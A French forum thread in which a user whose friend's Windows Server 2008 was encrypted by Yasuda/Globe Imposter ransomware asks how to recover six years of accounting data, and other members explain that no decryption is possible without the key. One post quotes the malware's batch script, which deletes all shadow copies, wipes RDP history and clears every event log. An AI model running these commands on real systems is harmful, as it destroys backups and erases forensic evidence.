Virus Yasuda sur serveur 2008

**cherif1969** · 17/04/2018, 11h39

Bonjour
un ami m'a filé un pc serveur
il ne peut plus entrer avec les identifiants administrateur .... et base sql
parait qu'il a été vérolé par ce virus de rançon
crypted_yasuda@firemail.cc
d'apres ce que j'ai vu sur le net c'est un virus de rançon
pour récupérer sa base sql :
quel moyen ?
...
J'ai pu entrer dans le serveur
tout est vérolé
Y a un bon antivirus sur les serveurs pour enlever ?
...
alors c'est tout encrypter ...... avec message si vous voulez decrypter faut m'envoier un mail ... etc .
y a til un logiciel pour enlever cet encryption ?
j'aimerai juste prendre tout sur EBP c'est la base de mon ami depuis 6 ans .......
Merci

**hackoofr** · 17/04/2018, 16h13

La 1ère chose à faire ==> https://id-ransomware.malwarehuntert...php?lang=fr_FR

**cherif1969** · 17/04/2018, 17h48

Bonjour
j'ai identifier le virus pour l'instant
comme il est dit chez eset
http://www.virusradar.com/en/Win32_F...FV/description

bonne avancée ...
merci je vais voir ce que tu m'as dit ......

je n'ai pas encore mis le diskdur dur serveur en esclave ... je n'ai pas la main en mode sans échec il demande un pass et utilisateur se trouvant sur un serveur externe .... ça fait longtemps que j'ai pas touché au serveur .....

**cherif1969** · 17/04/2018, 18h06

Sur le serveur il, y a plein de page html sur tous les dossiers
how_to_back_files.html
je dois la renommer en .... txt pour l'envoier sur le site que tu dis sinon il me laisse pas faire

suremeent un simple page html qui bloquerait toute les appli du serveur .... il rajoute l'extension sur chaque fichier

sur chaque dossier EBP il y a cette page web accrochée et donc elle doit être directement en lien avec les fichiers renommés (d'après moi .....)

Comment d'une façon simple enlever cette page web de tous les dossiers concernés ....
en mode dos je suis preneur ... ou faut-il aller dans la base de registre ?

Merci

**cherif1969** · 17/04/2018, 18h09

réponse au site que tu m'as donné

A ce stade, les fichiers chiffrés par ce ransomware ne peuvent etre décryptés.

Il est fortement recommandé de sauvegarder les fichiers chiffrés, dans l'espoir d'une solution future.

Identifiez-vous

ransomnote_email: yasuda@firemail.cc
sample_extension: .crypted_yasuda@firemail_cc
custom_rule: victim ID in encrypted file

**cherif1969** · 18/04/2018, 14h02

Bonjour
sur ce site :
http://www.virusradar.com/en/Win32_F...FV/description
il est dit en bas que le virus :
Other information

The trojan creates the following files:

%temp%\*__t%variable%.tmp.bat

A string with variable content is used instead of %variable% .

It contains the following text:
restore

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
    @echo off
    vssadmin.exe Delete Shadows /All /Quiet
    reg delete "HKEY_CURRENT_USER\*Software\*Microsoft\*Terminal Server Client\*Default" /va /f
    reg delete "HKEY_CURRENT_USER\*Software\*Microsoft\*Terminal Server Client\*Servers" /f
    reg add "HKEY_CURRENT_USER\*Software\*Microsoft\*Terminal Server Client\*Servers"
    cd %userprofile%\*documents\*
    attrib Default.rdp -s -h
    del Default.rdp
    for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Qu'est-ce qu'il fait exactement et est-il possible de simplement rétablir tous les fichiers justement en ouvrant les dossiers comme il le fait ?
je n'arrive pas à activer les fichiers cachés sous windows server 2008 / quel est la manipe ?

et en ouvrant certains fichiers crypter avec un namo webeditor j'ai vu qu'il y avait une même signature ID que le rançonneur dit avoir pris du pc .
Merci

**cherif1969** · 18/04/2018, 16h07

J'aurais besoin d'un connaisseur assembleur pour ce qu'il y a derrière ces fichiers
j'ai viré le virus , et lu avec un éditeur hex de fichiers jpg
ils ont tous les mêmes signatures
je voulais savoir si une personne pouvait voir ce qui cloche pour ouverture du jpg
car winodws me dit mauvais format

Merci

**chrtophe** · 18/04/2018, 20h03

En général, les fichiers sont cryptés avec une clé symétrique. Ce n'est pas récupérable, à moins que des listes de clés soient saisies sur les serveurs du rançonware. Mais comptes pas trop là-dessus.

Désolé.

**cherif1969** · 20/04/2018, 23h22

Il me faudrait un décrypteur
le cryptage est un globe imposter 2.0
y a personne en assembleur qui pourrait lire ?

**chrtophe** · 21/04/2018, 08h28

Non, il faut la clé de décryptage.

**cherif1969** · 21/04/2018, 14h25

Bonjour chrtophe
ça te coute quoi de visionner un fichier ?
Si tu connais assembleur

**chrtophe** · 21/04/2018, 18h56

Avec ce genre de cas, il n'y a malheureusement pas de solution.

**cherif1969** · 21/04/2018, 20h42

Bonsoir
J'ai bien compris ... mais
dans le serveur y a 6 ans de boulot et pas de point de restoration
est-ce qu'il y a quelque chose sous dos à récupérer ?
Sous Linux on devrait voir quelque chose
Plus on avance dans le temps et plus l'informatique est volatile
windows était une découverte , ensuite virtuel maintenant un fantôme .....

**chrtophe** · 21/04/2018, 20h53

Il est quand-même aberrant de ne pas avoir de sauvegarde sur un serveur.

Que ce soit sous DOS, Linux, les fichiers sont cryptés.

Tu peux toujours payer la rançon, mais tu n'a aucune garantie de récupérer les données.

**cherif1969** · 23/04/2018, 23h24

Oui c'est vraiment fou
2 associés qui avaient juste besoin d'EBP
ils ont utilisé un serveur sans sécurité

Virus Yasuda sur serveur 2008

Sécurité

Discussions similaires

Partager

Partager